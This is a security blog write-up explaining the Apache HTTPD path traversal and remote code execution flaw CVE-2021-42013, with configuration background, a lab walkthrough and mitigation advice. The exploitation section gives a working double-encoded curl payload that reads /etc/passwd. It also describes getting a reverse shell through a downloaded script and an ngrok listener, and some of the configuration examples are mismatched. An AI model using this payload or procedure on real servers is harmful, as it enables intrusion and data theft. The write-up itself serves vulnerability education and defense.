Apache HTTPD Remote Code Execution (CVE-2021-42013)

June 28, 2024

Overview 

CVE-2021-42013 is a notable vulnerability discovered in Apache HTTP Server versions 2.4.49 and 2.4.50. It was observed that the solution for an earlier vulnerability, CVE-2021-41773, in Apache HTTP Server 2.4.50 was not adequate. This led to the emergence of CVE-2021-42013, which allows an attacker to exploit a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. Moreover, if CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. 

The criticality of this vulnerability is highlighted by its CVSS score. The National Vulnerability Database (NVD) has assigned it a CVSS 3.x base score of 9.8, categorizing it as CRITICAL. 

CVE-2021-41773 vs CVE-2021-42013

CVE-2021-41773 and CVE-2021-42013 are both security issues found in Apache HTTP Server versions 2.4.49 and 2.4.50. The first one, CVE-2021-41773, is a problem where an attacker could trick the server into accessing files it shouldn’t be able to. This was due to a change in how the server handled file paths. If certain scripts were enabled, this could even allow the attacker to execute commands on the server. This problem was only present in version 2.4.49.

When the Apache team tried to fix this issue in version 2.4.50, they didn’t fully address the problem. This led to the second vulnerability, CVE-2021-42013. It’s similar to the first one, but it also affects version 2.4.50 because the initial fix was incomplete. So, both of these issues involve the same kind of attack, but the second one occurred because the solution to the first one wasn’t entirely effective. To successfully exploit the issue, you cannot use %2e directly in your HTML URL encoding. Instead, you should use the double-encoded version of %2e, which is %%32%65. 

Technical Breakdown

Before we dive into the technical details of CVE-2021-42013, it’s essential to understand two key components involved: CGI-Bin, Apache HTTPD, .

CGI-Bin: The cgi-bin directory is a standard directory on a server where CGI (Common Gateway Interface) scripts are stored. These scripts are used to generate dynamic web content, executing on the server to produce web pages tailored to the needs of users. CGI scripts can be written in various programming languages, including Perl, Python, and even compiled languages like C. While powerful, the capability to execute such scripts also presents significant security risks if not properly managed.

Require all granted: This is an authorization directive provided by Apache. It is used to control access to certain parts of the web server. The Require all granted directive allows access to the specified resource from any location. It’s equivalent to allowing all traffic to the specified resource. This is often used in a <Directory> block to specify the access control for a particular directory.


<IfModule !mpm_prefork_module>
        LoadModule cgid_module modules/mod_cgid.so
</IfModule>

In the above example, all clients are allowed to access the resources in the /var/www/html directory.

Alias: The Alias directive allows documents to be stored in the local filesystem other than under the DocumentRoot. URLs with a (%-decoded) path beginning with url-path will be mapped to local files beginning with directory-path. The url-path is case-sensitive, even on case-insensitive file systems.


Alias "/image" "/ftp/pub/image"

In the above example, a request for http://www.example.com/image/foo.gif would cause the server to return the file /ftp/pub/image/foo.gif, if it exists. If it doesn’t exist, then the server will return a 404 error.

Httpd.conf file:  httpd.conf file is the primary configuration file used by Apache HTTPD. This file is central to the customization and security of the server environment, dictating how the server behaves in various scenarios.  Configurations set in httpd.conf include: Server settings, Directory settings, Module loading, File access rules etc. Proper configuration and management of the httpd.conf file are critical, as misconfigurations can lead to vulnerabilities—potentially opening the door to unauthorized data access or system control. When discussing CVE-2021-42013, the httpd.conf settings related to modules such as mod_cgi and mod_proxy are particularly relevant, as they interact to create the conditions under which this vulnerability can be exploited.

Now dive into the insights of this issue.

Path Traversal

The technical essence of path traversal in CVE-2021-42013 lies in the way Apache HTTP Server decodes and normalizes URL paths. The server’s normalization function, which is designed to resolve URL-encoded values from the requested URI, processes Unicode values one at a time. This means that when the second dot in a “…/” sequence is URL-encoded as “%2e”, the server fails to recognize it as a dot and does not decode it. This effectively converts the “…/” sequence to “.%2e/”, bypassing the check designed to prevent path traversal attacks.

In the httpd.conf file of the apache server, the Directory/ block has the directive Require all granted, which means that all users are granted access to all directories on the server. This configuration, combined with the path traversal vulnerability, allows an attacker to read arbitrary files from the server’s file system.

Remote Code Execution

Remote Code Execution (RCE) vulnerabilities allow an attacker to execute arbitrary code on a server. In the context of CVE-2021-42013, RCE can occur if CGI scripts are enabled for the paths affected by the path traversal vulnerability.

In the httpd.conf file, the ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/" directive maps the /cgi-bin/ URL path to the /usr/local/apache2/cgi-bin/ directory on the server. As this directory contains executable CGI scripts and is affected by the path traversal vulnerability, an attacker could potentially execute arbitrary code on the server.

Furthermore, the Directory "/usr/local/apache2/cgi-bin" block has the directive Require all granted, which means that all users are granted access to all files in the /usr/local/apache2/cgi-bin/ directory. This configuration, combined with the path traversal vulnerability and the presence of executable CGI scripts, could allow an attacker to execute arbitrary code on the server.

Additionally, In the httpd.conf file, the cgid_module is loaded when the mpm_prefork_module is not loaded. This module enables the server to execute CGI scripts, which could potentially make it vulnerable to RCE attacks.



        LoadModule cgid_module modules/mod_cgid.so

Exploitation

We have set up a lab for this vulnerability and the application running on http://10.122.0.8:8088/. To find its version, run a nmap scan on this ip and port. Scan result says it is using apache httpd 2.4.50.

As this version is vulnerable to path traversal and remote code execution with non-default server configuration. So we have made some changes in the server’s configuration file. Details of this changes are below: 

The default configurations in Apache HTTPD server are as follows:

  • The cgi-bin is an alias directory.
  • The / directory is set for “require all denied”.
  • The /usr/local/apache2/htdocs directory is set to “require all granted”.
  • The /usr/local/apache2/cgi-bin directory is set to “require all granted”.
  • The CGI scripts are disabled.

To successfully exploit the Path Traversal vulnerability (CVE-2021-42013), the following conditions need to be met:

  • The default configuration of / as “require all denied” should be set to “require all granted”. This can be done by modifying the configuration as follows:


    AllowOverride none
    Require all granted

Now, let's exploit this path traversal issue. As discussed previously, to effectively exploit CVE-2021-42013 (Apache httpd 2.4.50), we cannot use %2e directly as HTML URL encoding. Instead, we must use the double-encoded version of %2e, which is %%32%65. The direct use of %2e targets servers running on the vulnerable versions, such as httpd 2.4.49. Therefore, the correct payload to exploit this vulnerability on the current server version would be:


curl -s --path-as-is "http://IP:Port/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"

In order to exploit the remote code execution, the following conditions need to be met. We have made changes to the server. Now the above curl command may not work. 

  • A directory needs to be an alias directory. In this case, cgi-bin is an alias directory.
  • Enable the CGI scripts module by uncommenting these lines in the configuration:

                        LoadModule cgid_module modules/mod_cgid.so

                         LoadModule cgi_module modules/mod_cgi.so

Download the exploit from here. Give it executable permission and before running this script, you must set your listening server. Here I have used the ngrok service that creates a secure

tunnel from the public internet to the local service running on TCP port 3000 on my machine. It  provided me with a public TCP address and port 15157. Once everything is set up, fire the script with: 

                                                                                                                 /1.sh target_ip target_port L_host L_port 

This gave me a reverse connection to my listener.   

Mitigation

To address these security issues, it’s advisable for users to update their Apache HTTP Server to version 2.4.51 or a later version. It’s also important to scrutinize the server configuration and make sure that the directory directive isn’t set to ‘Require all granted’ for the entire server’s filesystem. If your server operations don’t necessitate the use of CGI, you might want to consider turning it off as a precautionary measure against potential Remote Code Execution (RCE) attacks.

References

https://nvd.nist.gov/vuln/detail/CVE-2021-42013

https://medium.com/@ofriouzan/dissecting-and-exploiting-cve-2021-41773-and-cve-2021-42013-7c116f489ee2

https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

https://github.com/twseptian/cve-2021-42013-docker-lab/tree/main